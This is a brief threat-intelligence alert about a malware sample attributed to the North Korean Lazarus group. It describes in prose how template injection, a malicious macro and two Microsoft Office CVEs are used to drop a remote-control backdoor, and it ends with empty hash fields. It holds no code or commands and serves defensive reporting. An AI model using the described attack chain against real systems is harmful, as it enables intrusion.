High
A new active sample is detected that is being linked to the Advanced Persistent Threat group from North Korea, called Lazarus or Hidden Cobra. The sample leverages template injection to execute malicious macro and drop a backdoor to a target system, meant to control the target computer remotely. It’s likely delivered via an office file detected as a Trojan dropper. Common attack methods of this group include exploiting zero-days, spearphishing, malware, disinformation, backdoors, droppers, etc. The group is a financially motivated threat actor and has been linked with major breaches over this past decade. The attack may also be exploiting two vulnerabilities in Microsoft Office; CVE-2017-11882, a memory corruption vulnerability and CVE-2017-0199, a remote code execution vulnerability.
MD5
SHA-256
SHA1